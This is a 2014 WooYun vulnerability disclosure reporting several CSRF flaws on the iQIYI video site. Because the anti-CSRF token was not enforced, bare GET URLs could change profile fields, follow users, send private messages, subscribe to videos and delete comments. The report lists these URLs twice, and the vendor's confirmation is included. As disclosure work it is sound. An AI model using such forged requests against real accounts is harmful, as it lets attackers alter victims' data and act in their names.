当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-074227

漏洞标题:爱奇艺视频网存在多个CSRF漏洞..

相关厂商:奇艺

漏洞作者: q601333824

提交时间:2014-08-28 18:37

修复时间:2014-10-12 18:38

公开时间:2014-10-12 18:38

漏洞类型:CSRF

危害等级:低

自评Rank:3

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-08-28: 细节已通知厂商并且等待厂商处理中
2014-08-29: 厂商已经确认,细节仅向厂商公开
2014-09-08: 细节向核心白帽子及相关领域专家公开
2014-09-18: 细节向普通白帽子公开
2014-09-28: 细节向实习白帽子公开
2014-10-12: 细节向公众公开

简要描述:

爱奇艺视频网存在多个CSRF漏洞..

详细说明:


1.截取关注请求连接

关注.png


2.得到连接

http://www.iqiyi.com/u/api/relation/follow?uids=2214309904&agent_type=202&followfrm=1_0_0_0&antiCsrf=87541a9210aacd620d691b76315f0704&callback=window.Q.__callbacks__.cbvars5v


3.UID代表关注的人ID呢,参数antiCsrf是防止csrf的参数,但是,这个参数真有用吗?.下面一张图告诉你这个antiCsrf参数只是摆样子的,如图
其实这个连接也是可以添加关注的

http://www.iqiyi.com/u/api/relation/follow?uids=2214309904


成功.png


4。如果审核的人访问上面那个连接,出现下面图上这个问题,代表,你已经关注了对方了.虽然A00000表示返回成功,但是我测试的时候关注了的人访问就显示这个,取消重新访问又会显示A00000

失败.png


------------------------------------------------------------------------------------
5.上面的测试知道了防止CSRF的参数只是摆样子,所以我去整理存在csrf的地方,下面
(1).关注:

http://www.iqiyi.com/u/api/relation/follow?uids=2214309904


设置资料的地方全都有

页面.png


(2).设置性别:

http://www.iqiyi.com/u/api/user/update_user_info?gender=1


(3).设置血型:

http://www.iqiyi.com/u/api/user/update_user_info?blood_type=2


(4).设置生日“

http://www.iqiyi.com/u/api/user/update_user_info?birthday=11111111


(5).设置居住地:

http://www.iqiyi.com/u/api/user/update_user_info?province=11&city=1


(6).设置用户QQ:

http://www.iqiyi.com/u/api/user/update_user_info?qq=601333824


(7).设置毕业的大学:

http://www.iqiyi.com/u/api/user/update_user_info?school=[{"degree":"大学","name":"青岛教育学院","entry_time":2014,"college":"信息工程"}]


(8).下面的设置毕业学校一样,我就了下图

同样.png


--------------------------------------------------------------------------------
(9).用户间的私信功能:

http://notice.iqiyi.com/apis/msg/send_private_msg.action?send_uid=2214309904(谁发送的)&rev_uid=1093162012(发送到的用户)&content=aaaa(私信内容)




可以写成

http://notice.iqiyi.com/apis/msg/send_private_msg.action?rev_uid=1093162012(发送到的用户)&content=aaaa(私信内容)


(私信要相互关注才有效,所以可以配合关注CSRF)

私信.png


(10).订阅收藏视频功能:

http://subscription.iqiyi.com/dingyue/api/subscribe.action?subType=7&subKey=300344200


(11).删除视频评论csrf

http://api.t.iqiyi.com/qx_api/comment/delete?cb=fnsucc&contentid=1408220175218586


(虽然访问提示未登录,但是测试可删除对应评论ID)

漏洞证明:

(1).关注:

http://www.iqiyi.com/u/api/relation/follow?uids=2214309904


设置资料的地方全都有

页面.png


(2).设置性别:

http://www.iqiyi.com/u/api/user/update_user_info?gender=1


(3).设置血型:

http://www.iqiyi.com/u/api/user/update_user_info?blood_type=2


(4).设置生日“

http://www.iqiyi.com/u/api/user/update_user_info?birthday=11111111


(5).设置居住地:

http://www.iqiyi.com/u/api/user/update_user_info?province=11&city=1


(6).设置用户QQ:

http://www.iqiyi.com/u/api/user/update_user_info?qq=601333824


(7).设置毕业的大学:

http://www.iqiyi.com/u/api/user/update_user_info?school=[{"degree":"大学","name":"青岛教育学院","entry_time":2014,"college":"信息工程"}]


(8).下面的设置毕业学校一样,我就了下图

同样.png


--------------------------------------------------------------------------------
(9).用户间的私信功能:

http://notice.iqiyi.com/apis/msg/send_private_msg.action?send_uid=2214309904(谁发送的)&rev_uid=1093162012(发送到的用户)&content=aaaa(私信内容)




可以写成

http://notice.iqiyi.com/apis/msg/send_private_msg.action?rev_uid=1093162012(发送到的用户)&content=aaaa(私信内容)


(私信要相互关注才有效,所以可以配合关注CSRF)

私信.png


(10).订阅收藏视频功能:

http://subscription.iqiyi.com/dingyue/api/subscribe.action?subType=7&subKey=300344200


(11).删除视频评论csrf

http://api.t.iqiyi.com/qx_api/comment/delete?cb=fnsucc&contentid=1408220175218586


(虽然访问提示未登录,但是测试可删除对应评论ID)

修复方案:

出现csrf的问题和这两个漏洞一样漏洞
1. WooYun: 新浪博客某处标签过滤不严可xss及多处csrf漏洞
2. WooYun: 新浪博客某处鸡肋越权及CSRF漏洞

版权声明:转载请注明来源 q601333824@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2014-08-29 12:54

厂商回复:

感谢您的提交,我们会尽快进行处理。希望您继续支持爱奇艺PPS。

最新状态:

暂无